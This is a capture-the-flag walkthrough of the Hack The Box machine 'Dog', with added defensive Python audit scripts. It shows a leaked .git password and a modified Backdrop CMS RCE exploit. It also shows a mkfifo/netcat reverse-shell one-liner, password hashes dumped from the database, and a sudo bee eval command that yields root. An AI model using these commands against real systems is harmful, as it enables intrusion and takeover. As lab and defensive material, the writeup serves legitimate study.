Dog HTB Writeup

The document details a penetration testing process on a target machine (10.10.11.58) using tools like RustScan and Nmap, revealing open ports for SSH and HTTP. It describes exploiting a vulnerability in Backdrop CMS to gain administrative access, followed by retrieving sensitive data from the exposed .git folder and accessing the MySQL database. The final steps include gaining SSH access to the machine and utilizing a command-line utility for further actions.

Uploaded by leojhoao03

Dog (10.10.11.58)
Enumeration & Data Gathering
rustscan -a [Link] -- -sC -Pn
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: [Link] :
: [Link] :
--------------------------------------
I scanned my computer so many times, it thinks we're dating.

[~] The config file is expected to be at "/home/kali/.[Link]"


[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open [Link]:80
Open [Link]:22
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -sC -Pn" on ip [Link]
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.94SVN ( [Link] ) at 2025-03-08 20:11 +00
NSE: Loaded 126 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 20:11
Completed NSE at 20:11, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 20:11
Completed NSE at 20:11, 0.00s elapsed
Initiating SYN Stealth Scan at 20:11
Scanning [Link] ([Link]) [2 ports]
Discovered open port 80/tcp on [Link]
Discovered open port 22/tcp on [Link]
Completed SYN Stealth Scan at 20:11, 0.35s elapsed (2 total ports)
NSE: Script scanning [Link].
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 20:11
Completed NSE at 20:12, 11.32s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 20:12
Completed NSE at 20:12, 0.00s elapsed
Nmap scan report for [Link] ([Link])
Host is up, received user-set (0.33s latency).
Scanned at 2025-03-08 [Link] +00 for 12s

PORT STATE SERVICE REASON


22/tcp open ssh syn-ack ttl 63
| ssh-hostkey:
| 3072 [Link] (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDEJsqBRTZaxqvLcuvWuqOclXU1uxwUJv98W1TfLTgTYqIBzWAqQR7Y6fXBOUS6FQ9xctARWGM3w3AeDw
| 256 [Link] (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBM/NEdzq1MMEw7EsZsxWuDa+kSb+OmiGvYnPofRWZOOMhFgs
| 256 [Link] (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPMpkoATGAIWQVbEl67rFecNZySrzt944Y/hWAyq4dPc
80/tcp open http syn-ack ttl 63
| [Link]: 22 disallowed entries
| /core/ /profiles/ /[Link] /[Link] /admin
| /comment/reply /filter/tips /node/add /search /user/register
| /user/password /user/login /user/logout /?q=admin /?q=comment/reply
| /?q=filter/tips /?q=node/add /?q=search /?q=user/password
|_/?q=user/register /?q=user/login /?q=user/logout
|_http-favicon: Unknown favicon MD5: 3836E83A3E835A26D789DDA9E78C5510
|_http-title: Home | Dog
|_http-generator: Backdrop CMS 1 ([Link]
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-git:
| [Link]:80/.git/
| Git repository found!
| Repository description: Unnamed repository; edit this file 'description' to name the...
|_ Last commit message: todo: customize url aliases. reference:[Link]

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 20:12
Completed NSE at 20:12, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 20:12
Completed NSE at 20:12, 0.00s elapsed
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 11.94 seconds
Raw packets sent: 2 (88B) | Rcvd: 2 (88B)

Port 22 - SSH

Port 80 - HTTP

/.git Folder exposed

We use git-dumper to dump and reconstruct the files from the exposed .git folder we found:

git-dumper [Link] ./gitdump

Within the dumped repository we managed to find the following data:

root:BackDropJ2024DS2024

tiffany

Backdrop CMS V1.27.1

If we try that SQL password with the user tiffany on the login page, it works as well and takes us to the CMS administrator dashboard.
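The credentials above came out of a .git folder that was sitting inside the served web root. As a defender's check, here is an added Python example (not part of the original writeup, and not git-dumper or Backdrop code) that audits a document root for the two conditions this box illustrates: a version-control directory inside the served tree, and database credentials embedded in configuration files. The sample tree it builds is constructed for the demonstration; the Backdrop-style `mysql://user:password@host/db` DSN in settings.php is an assumption about how such credentials appear, and the password in it is made up.

```python
import os
import re
import tempfile
from pathlib import Path

# Directories that must never be reachable inside a served document root.
VCS_DIRS = {".git", ".svn", ".hg"}

# Credential patterns commonly found in CMS configuration files.
# The DSN form (scheme://user:password@host/...) is assumed to be how the
# Backdrop settings.php on the page carried the leaked root password.
CREDENTIAL_PATTERNS = {
    "dsn_with_password": re.compile(r"\b[a-z]+://([^:/\s'\"]+):([^@\s'\"]+)@"),
    "php_password_key": re.compile(r"['\"]password['\"]\s*=>\s*['\"][^'\"]+['\"]"),
    "env_password": re.compile(r"^[A-Z_]*PASSWORD\s*=\s*\S+", re.MULTILINE),
}


def audit_docroot(root):
    """Walk a document root and return (kind, relative_path, detail) findings.

    Secrets are never echoed back: the detail names the account for a DSN
    match and is otherwise a fixed label.
    """
    root = Path(root)
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in list(dirnames):
            if name in VCS_DIRS:
                rel = Path(dirpath, name).relative_to(root)
                findings.append(("vcs_dir_in_docroot", str(rel), name))
                dirnames.remove(name)  # no need to descend into the VCS metadata
        for fname in filenames:
            path = Path(dirpath, fname)
            try:
                text = path.read_text(errors="replace")
            except OSError:
                continue
            rel = str(path.relative_to(root))
            for kind, pattern in CREDENTIAL_PATTERNS.items():
                for match in pattern.finditer(text):
                    if kind == "dsn_with_password":
                        detail = f"user={match.group(1)}"
                    else:
                        detail = "password literal"
                    findings.append((kind, rel, detail))
    return findings


def build_sample_docroot():
    """Constructed sample tree (not the real target), laid out like the writeup's box."""
    root = Path(tempfile.mkdtemp(prefix="docroot_"))
    (root / ".git").mkdir()
    (root / ".git" / "HEAD").write_text("ref: refs/heads/master\n")
    (root / "core").mkdir()
    (root / "core" / "index.php").write_text("<?php echo 'hello';\n")
    # Made-up credentials in a Backdrop-style DSN; the password is not the page's.
    (root / "settings.php").write_text(
        "<?php\n$database = 'mysql://root:Sample-Pass-123@localhost/backdrop';\n"
    )
    return root


if __name__ == "__main__":
    for finding in audit_docroot(build_sample_docroot()):
        print(*finding)
```

Run `audit_docroot('/var/www/html')` on a real host. A vcs_dir finding means the directory has to be moved out of the served tree or blocked in the web server configuration (the nmap http-git script output on this page shows how easily it is spotted from outside). A credential finding means the secret should be rotated, since it has already reached the repository, and as the rest of this writeup shows, a leaked database password reused for a CMS account and a shell account turns one exposure into full access.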

Exploitation
Now that we have access to the website as an administrator there is plenty we can do! What stands out is this RCE. How did I find it? A simple search for
Backdrop CMS with the version we found.
Let's start by building the shell using the PoC script given on ExploitDB!

┌──(kali ㉿kali)-[~/htb/pwn/dog]
└─$ python3 [Link]
Usage: python [Link] [url]


┌──(kali kali)-[~/htb/pwn/dog]
└─$ python3 [Link] [Link]
Backdrop CMS 1.27.1 - Remote Command Execution Exploit
Evil module generating...
Evil module generated! [Link]
Go to [Link] and upload the [Link] for Manual Installation.
Your shell address: [Link]

If we try to upload the generated [Link] we'll get an error:

Let's try tweaking the script to generate a .[Link] archive instead; maybe that helps us bypass this. Simply edit the create_zip function and add the appropriate import.

import tarfile

def create_zip(info_path, php_path):
    # Package the generated module as a gzipped tarball instead of a zip.
    # The archive and member names are elided as [Link] in this copy of the page.
    tar_filename = "[Link]"
    with tarfile.open(tar_filename, "w:gz") as tar:
        tar.add(info_path, arcname='shell/[Link]')
        tar.add(php_path, arcname='shell/[Link]')
    return tar_filename

And yes it did!

Now if we go to [Link] we'll get our PHP shell, from which we can spawn a reverse shell using

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc $IP $PORT >/tmp/f

Great, now we have a reverse shell on the machine! Let's check which users exist.

www-data@dog:/var/www/html/modules/shell$ cat /etc/passwd


cat /etc/passwd

root:x:0:0:root:/root:/bin/bash
jobert:x:1000:1000:jobert:/home/jobert:/bin/bash
johncusack:x:1001:1001:,,,:/home/johncusack:/bin/bash

OK, there seem to be three users. Also note that Backdrop CMS is currently running from /var/www/html (this will be crucial later, says me from the future 😛).

Also, since we're now on the machine we can access the SQL DB directly; let's do that and check whether there's anything interesting there.

www-data@dog:/var/www/html$ mysql -u root -p


Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 11969
Server version: 8.0.41-0ubuntu0.20.04.1 (Ubuntu)

Copyright (c) 2000, 2025, Oracle and/or its affiliates.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql>

Alright, we're in. Let's see what we have here.

mysql> SHOW DATABASES;


+--------------------+
| Database |
+--------------------+
| backdrop |
| information_schema |
| mysql |
| performance_schema |
| sys |
+--------------------+
5 rows in set (0.00 sec)

mysql> use backdrop;


Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
+-----------------------------+
| Tables_in_backdrop |
+-----------------------------+
| batch |
| cache |
| ... |
| ... |
| users |
| users_roles |
| variable |
| watchdog |
+-----------------------------+

59 rows in set (0.00 sec)

mysql> select * from users;


+-----+-------------------+---------------------------------------------------------+----------------------------+-----------+------------------+------------+
| uid | name | pass | mail | signature | signature_format | created | changed | access | login | status
+-----+-------------------+---------------------------------------------------------+----------------------------+-----------+------------------+------------+
| 0| | | | | NULL | 0| 0| 0| 0| 0 | NULL | | 0|
| 1 | jPAdminB | $S$E7dig1GTaGJnzgAXAtOoPuaTjJ05fo8fH9USc6vO87T./ffdEr/. | jPAdminB@[Link] | | NULL | 1720548614 | 17205
| 2 | jobert | $S$E/F9mVPgX4.dGDeDuKxPdXEONCzSvGpjxUeMALZ2IjBrve9Rcoz1 | jobert@[Link] | | NULL | 1720584462 | 1720
| 3 | dogBackDropSystem | $S$EfD1gJoRtn8I5TlqPTuTfHRBFQWL3x6vC5D3Ew9iU4RECrNuPPdD | dogBackDroopSystem@[Link] | | NULL |1
| 5 | john | $S$EYniSfxXt8z3gJ7pfhP5iIncFfCKz8EIkjUD66n/OTdQBFklAji. | john@[Link] | | NULL | 1720632910 | 1720632910 |
| 6 | morris | $S$E8OFpwBUqy/xCmMXMqFp3vyz1dJBifxgwNRMKktogL7VVk7yuulS | morris@[Link] | | NULL | 1720632931 | 172
| 7 | axel | $S$E/DHqfjBWPDLnkOP5auHhHDxF4U.sAJWiODjaumzxQYME6jeo9qV | axel@[Link] | | NULL | 1720632952 | 1720
| 8 | rosa | $S$EsV26QVPbF.s0UndNPeNCxYEP/0z2O.2eLUNdKW/[Link] | rosa@[Link] | | NULL | 1720632982 | 17206
| 10 | tiffany | $S$EEAGFzd8HSQ/IzwpqI79aJgRvqZnH4JSKLv2C83wUphw0nuoTY8v | tiffany@[Link] | | NULL | 1723752136 | 1723
+-----+-------------------+---------------------------------------------------------+----------------------------+-----------+------------------+------------+
9 rows in set (0.02 sec)

I tried cracking both hashes of Jobert and John but no success.

As a last resort, and just out of luck, I checked if tiffany's password would work on any of the users, and it did with johncusack 🤦🏻‍♂️

ssh johncusack@[Link]
johncusack@[Link]'s password:
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-208-generic x86_64)

* Documentation: [Link]
* Management: [Link]
* Support: [Link]

johncusack@dog:~$ cat [Link]


375df087aaebc87d7e4ab8614ff2b53f

Privilege Escalation

OK, we have sudo rights on Bee.

Bee is a command line utility for Backdrop CMS. It includes commands that allow
developers to interact with Backdrop sites, performing actions like:

Running cron

Clearing caches

Downloading and installing Backdrop

Downloading, enabling and disabling projects

Viewing information about a site and/or available projects

Source

johncusack@dog:~$ sudo bee --help


🐝 Bee
Usage: bee [global-options] <command> [options] [arguments]

Global Options:
--root
Specify the root directory of the Backdrop installation to use. If not set, will try to find the Backdrop installation automatically based on the current directory.

......

ADVANCED
db-query
dbq
Execute a query using db_query().

eval
ev, php-eval
Evaluate (run/execute) arbitrary PHP code after bootstrapping Backdrop.

The eval command is definitely interesting here: it says it can execute arbitrary PHP code. So can we use it to spawn a shell? Let's try it out!

johncusack@dog:~$ sudo bee eval 'system("/bin/bash");'

✘ The required bootstrap level for 'eval' is not ready.

Hmm, something is wrong here. Let's use status to check what's going on.

johncusack@dog:~$ sudo bee status

⚠ No Backdrop installation found. Run this command again from within a Backdrop installation, or use the '--root' global
option.

OK, I see: it couldn't detect the Backdrop installation path, but we already know it from the shell we got during initial access, and we can
specify it using --root.

johncusack@dog:~$ sudo bee --root=/var/www/html eval 'system("/bin/bash");'


root@dog:/var/www/html# cat /root/[Link]
ddbe23c2046a10d74c829d56084918f2
root@dog:/var/www/html#
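The escalation above works because a sudo rule grants root on a tool whose eval and db-query sub-commands run arbitrary code, so the grant is a root shell by another name. As an added defender's example (not part of the original writeup and not Bee or sudo code), the Python below parses sudoers user-specification lines and flags rules that amount to root code execution: unrestricted ALL rules, and commands that are known code-evaluating binaries runnable as root. The sudoers sample is constructed to resemble this box (the page only states that johncusack has sudo on bee; the real file is not shown); the list of code-evaluating binaries beyond bee is general knowledge, and the parser handles the common rule shapes only, not the full sudoers grammar.

```python
import re
from pathlib import PurePosixPath

# Binaries that evaluate caller-supplied code. Granting any of them via sudo
# is equivalent to granting a root shell. "bee" is the case on the page (its
# eval sub-command runs arbitrary PHP, db-query runs arbitrary SQL); the
# others are general knowledge.
CODE_EVAL_BINARIES = {"bee", "php", "python", "python3", "perl", "ruby", "node", "bash", "sh"}

# user  host=(runas[:rungroup]) [TAG: ...] command[, command ...]
SUDO_RULE = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>\S+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)"
    r"(?P<cmds>.+)$"
)
SKIP_PREFIXES = ("Defaults", "User_Alias", "Runas_Alias", "Host_Alias", "Cmnd_Alias")


def parse_sudoers(text):
    """Parse user-specification lines; aliases, Defaults and comments are skipped."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith(SKIP_PREFIXES):
            continue
        match = SUDO_RULE.match(line)
        if not match:
            continue
        runas_field = match.group("runas") or "root"  # sudo defaults to root
        runas = runas_field.split(":")[0].strip() or "root"
        tags = {t.strip() for t in match.group("tags").split(":") if t.strip()}
        cmds = [c.strip() for c in match.group("cmds").split(",")]
        rules.append({"who": match.group("who"), "runas": runas,
                      "nopasswd": "NOPASSWD" in tags, "cmds": cmds})
    return rules


def audit_sudoers(text):
    """Return (who, command, reason) for rules that amount to root code execution."""
    findings = []
    for rule in parse_sudoers(text):
        root_capable = rule["runas"] in ("root", "ALL")
        for cmd in rule["cmds"]:
            binary = PurePosixPath(cmd.split()[0]).name
            if cmd == "ALL":
                findings.append((rule["who"], cmd, "unrestricted sudo"))
            elif root_capable and binary in CODE_EVAL_BINARIES:
                reason = f"'{binary}' evaluates arbitrary code as {rule['runas']}"
                if rule["nopasswd"]:
                    reason += " without a password"
                findings.append((rule["who"], cmd, reason))
    return findings


# Constructed sample modelled on the writeup; the real sudoers is not on the page.
SAMPLE_SUDOERS = """\
Defaults env_reset
root        ALL=(ALL:ALL) ALL
johncusack  ALL=(ALL) /usr/local/bin/bee
deploy      ALL=(root) NOPASSWD: /usr/bin/systemctl restart apache2
%admin      ALL=(ALL) ALL
"""

if __name__ == "__main__":
    for who, cmd, reason in audit_sudoers(SAMPLE_SUDOERS):
        print(f"{who}: {cmd} -> {reason}")
```

Run it over the output of `sudo -l` on each host or over the files under /etc/sudoers.d. Because sudo matches on the command path and not on sub-commands, there is no sudoers syntax that allows `bee cron` while forbidding `bee eval`; the fix for a finding like the johncusack rule is to remove the grant, or to replace it with a root-owned wrapper script that hard-codes the intended sub-command and the --root path and takes no further arguments.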
